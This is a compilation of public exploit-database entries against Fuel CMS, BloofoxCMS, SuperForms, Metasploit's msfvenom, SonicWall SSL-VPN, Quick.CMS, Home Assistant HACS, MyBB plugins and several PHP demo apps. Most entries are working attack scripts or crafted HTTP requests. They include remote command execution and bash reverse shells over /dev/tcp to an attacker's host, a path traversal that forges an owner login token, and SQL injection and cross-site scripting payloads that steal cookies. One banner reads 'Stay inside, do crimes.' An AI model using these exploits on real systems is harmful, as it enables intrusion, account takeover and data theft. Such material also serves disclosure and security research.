# Title: Fuel CMS 1.4.1 - Remote Code Execution (2) # Exploit Author: Alexandre ZANNI # Date: 2020-11-14 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu 16.04 # CVE : CVE-2018-16763 # References: https://www.exploit-db.com/exploits/47138 #!/usr/bin/env ruby require 'httpclient' require 'docopt' # dirty workaround to ignore Max-Age # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932 $VERBOSE = nil doc = <<~DOCOPT Fuel CMS 1.4 - Remote Code Execution Usage: #{__FILE__} <url> <cmd> #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <cmd> The system command to execute -h, --help Show this screen Examples: #{__FILE__} http://example.org id #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd' DOCOPT def exploit(client, root_url, cmd) url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'" res = client.get(url) /system(.+?)<div/mx.match(res.body).captures[0].chomp end begin args = Docopt.docopt(doc) clnt = HTTPClient.new puts exploit(clnt, args['<url>'], args['<cmd>']) rescue Docopt::Exit => e puts e.message end

# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting # Exploit Author: LiPeiYi # Date: 2020-12-18 # Vendor Homepage: https://www.bloofox.com/ # Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 # Version: 0.5.1.0 -.5.2.1 # Tested on: windows 10 Vulnerable paper: /admin/include/inc_content_articles.php Steps to reproduce: 1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side. 2: Add the new post and then add the payload "payload: <img src=# onerror=alert('xss')>" in "text" parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution # Exploit Author: ABDO10 # Date : Jan - 28 - 2021 # Google Dork : inurl:"/wp-content/plugins/super-forms/" # Vendor Homepage : https://renstillmann.github.io/super-forms/#/ # Version : All (<= 4.9.X) # data in http request : POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 <=== exploit end point Host: localhost User-Agent: UserAgent Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996 Content-Length: 7058 Origin: localhost Connection: close Referer: localhost Cookie: -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="accept_file_types" jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <======= inject extension (|PHP4) to validate file to upload -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="max_file_size" 8000000 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="image_library" 0 -----------------------------423513681827540048931513055996 Content-Disposition: form-data; name="files[]"; filename="filename.(extension)" <==== inject code extension (.php4) for example Content-Type: application/pdf Evil codes to be uploaded -----------------------------423513681827540048931513055996-- # Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4 u can get <id> from server reply .

# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection # Exploit Author: Justin Steven # Vendor Homepage: https://www.metasploit.com/ # Software Link: https://www.metasploit.com/ # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 # CVE : CVE-2020-7384 #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b64encode # Change me payload = 'echo "Code execution as $(id)" > /tmp/win' # b64encode to avoid badchars (keytool is picky) payload_b64 = b64encode(payload.encode()).decode() dname = f"CN='|echo {payload_b64} | base64 -d | sh #" print(f"[+] Manufacturing evil apkfile") print(f"Payload: {payload}") print(f"-dname: {dname}") print() tmpdir = tempfile.mkdtemp() apk_file = os.path.join(tmpdir, "evil.apk") empty_file = os.path.join(tmpdir, "empty") keystore_file = os.path.join(tmpdir, "signing.keystore") storepass = keypass = "password" key_alias = "signing.key" # Touch empty_file open(empty_file, "w").close() # Create apk_file subprocess.check_call(["zip", "-j", apk_file, empty_file]) # Generate signing key with malicious -dname subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]) # Sign APK using our malicious dname subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file, "-storepass", storepass, "-keypass", keypass, apk_file, key_alias]) print() print(f"[+] Done! apkfile is at {apk_file}") print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")

# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated) # Exploit Author: Darren Martyn # Vendor Homepage: https://www.home-assistant.io/ # Version: < SMA 8.0.0.4 # Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ #!/usr/bin/python # coding: utf-8 # Author: Darren Martyn # Credit: Phineas Fisher # Notes: # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns # a trivial reverse shell using /dev/tcp. # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but # implementing that is left as an exercise for the reader. I've seen a few approaches, and # would be interested in seeing yours. # There is another LPE that works only on some models which I also have removed from this. # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ import requests import sys import telnetlib import socket from threading import Thread from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import time def banner(): print """ 88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 SonicWall SSL-VPN Appliance Remote Exploit Public Release (Jan 2021). Author: Darren Martyn. Credit goes to Phineas Fisher for this. Stay inside, do crimes. """ def handler(lp): # handler borrowed from Stephen Seeley. print "(+) starting handler on port %d" %(lp) t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" %(addr[0]) t.sock = conn print "(+) pop thy shell!" t.interact() def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} r = requests.get(url=url, headers=headers, verify=False) return r.text def check_exploitable(target): print "(+) Testing %s for pwnability..." %(target) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print "(*) We can continue, time to wreck this shit." return True else: return False def pop_reverse_shell(target, cb_host, cb_port): print "(+) Sending callback to %s:%s" %(cb_host, cb_port) backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) execute_command(target=target, command=backconnect) def hack_the_planet(target, cb_host, cb_port): if check_exploitable(target) == True: pass else: sys.exit("(-) Target not exploitable...") handlerthr = Thread(target=handler, args=(int(cb_port),)) handlerthr.start() pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) def main(args): banner() if len(args) != 4: sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) # Date: 2020-12-28 # Exploit Author: mari0x00 # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip # Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ # Version: <= 6.7 # CVE : CVE-2020-35754 #!/usr/bin/python3 import requests import sys from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ [email protected] pass123 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "sEmail": username, "sPass": password, "bAcceptLicense": "1", "iAcceptLicense": "true" } login = s.post(url+"admin.php?p=login", login_data, headers=headers) sleep(0.5) #Exploit print((colored("[+] Adding shell command","blue"))) payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" shell = { "sOption": "save", "Back_end_only": payload } exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) sleep(1) #Triggering reverse shell (three times just in case) print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers)

# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection # Date: 2021-01-28 # Exploit Author: Ruchi Tiwari # Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request POST /onlinegradingsystem/admin/login.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/onlinegradingsystem/admin/login.php Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us Upgrade-Insecure-Requests: 1 uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin= #Application will load after 20 minutes. --------------------------------------------------------------------------------------------------------------------

# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover # Date: 2021-01-28 # Exploit Author: Lyghtnox # Vendor Homepage: https://www.home-assistant.io/ # Software Link: https://github.com/hacs/integration # Version: < 1.10.0 # Tested on: Raspbian + Home Assistant 2021.1.0 # Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/ # STEP 1: Run the exploit (python3 exploit.py host port) # STEP 2: Copy the token printed and set in your browser's local storage with # the key `hassTokens` import requests import jwt import json import argparse class HA: def __init__(self, ip, port): self.ip = ip self.port = port def retrieveFile(self, f): url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}' with requests.Session() as s: r = requests.Request(method='GET', url=url) prep = r.prepare() prep.url = url try: r = s.send(prep, verify=False) except requests.exceptions.ConnectionError: return if r.status_code == 400 or r.status_code == 404: return return r def craftToken(self): f = self.retrieveFile('.storage/auth').json() # Find owner for user in f['data']['users']: if user['is_owner']: self.owner = user['id'] break else: print("No owner found. Using first account") self.owner = f['data']['users'][0]['id'] for token in f['data']['refresh_tokens']: if self.owner == token['user_id']: encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256") self.token = {'access_token': encoded_jwt, 'token_type': 'Bearer', 'refresh_token': token['token'], 'expires_in': 1800, 'hassUrl': f"http://{self.ip}:{self.port}", 'clientId': token['client_id']} return self.token if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit a vulnerability in \ HACS < 1.10.0 to gain admin access to an Home Assistant instance.") parser.add_argument("host", type=str, help="IP of the HASS instance") parser.add_argument("port", type=int, help="port of the HASS instance") args = parser.parse_args() r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format( ip=args.host, port=args.port)) if r.status_code != 404: print("HACS found! Testing vulnerability...", end='', flush=True) ha = HA(args.host, args.port) if ha.retrieveFile('configuration.yaml'): print(": VULNERABLE") token = ha.craftToken() if token: print(f"Use the following 'hassTokens': {json.dumps(token)}") else: print("Unable to craft token") else: print(": Not vulnerable")

# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure # Date: 1/27/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=1430 # Version: 1.0 # Tested on: Windows 10 # CVE: CVE-2021-3337 1. Description: This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying. 2. Proof of Concept: - Visit a post where content is hidden - Click the reply or quote button below Thread content will be displayed in the [quote] bracket without needing to reply

# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Replicates across chat sessions.. POST /chat/send_message.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 58 Origin: http://localhost Connection: close Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1

# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 POST /chat/login.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 51 Connection: close Referer: http://localhost/chat/index.php?attempt= Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl Upgrade-Insecure-Requests: 1 username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--

# Exploit Title: User Management System 1.0 - 'uid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/admin/ and login with your account 2- then go to http://localhost/admin/registered-users.php 3- Click edit on any user and then add the following payload to the url payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT) If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --cookies="cookies here" --dbs example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs ___ __H__ ___ ___[,]_____ ___ ___ {1.4.10.16#dev} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 22:55:16 /2021-01-29/ [22:55:16] [INFO] resuming back-end DBMS 'mysql' [22:55:16] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: uid (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT 1849 UNION SELECT 3460) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) --- [22:55:16] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10 back-end DBMS: MySQL >= 5.0.12 [22:55:16] [INFO] fetching database names [22:55:16] [INFO] fetching number of databases [22:55:16] [INFO] resumed: 6 [22:55:16] [INFO] resumed: mysql [22:55:16] [INFO] resumed: information_schema [22:55:16] [INFO] resumed: performance_schema [22:55:16] [INFO] resumed: sys [22:55:16] [INFO] resumed: umspsdb [22:55:16] [INFO] resumed: zmsdb available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sys [*] umspsdb [*] zmsdb [22:55:16] [INFO] fetched data logged to text files under

# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/animals.php and click on an animal 2- then add the following payload to the url payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --dbs example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.4.10.16#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:05:33 /2021-01-29/ [23:05:34] [INFO] resuming back-end DBMS 'mysql' [23:05:34] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y sqlmap resumed the following injection point(s) from stored session: --- Parameter: anid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- - --- [23:05:36] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10, PHP back-end DBMS: MySQL >= 5.0.12 [23:05:36] [INFO] fetching database names available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sys [*] umspsdb [*] zmsdb [23:05:36] [INFO] fetched data logged to text files under

# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting # Date: 1/25/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/ # Version: 1.4 # Tested on: Windows 10 1. Description: This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS. 2. Proof of Concept: - Go to User CP -> Delete Account - Input a payload for delete account reason <script>alert('XSS')</script> Payload will execute here.. admin/index.php?module=user-deleteaccount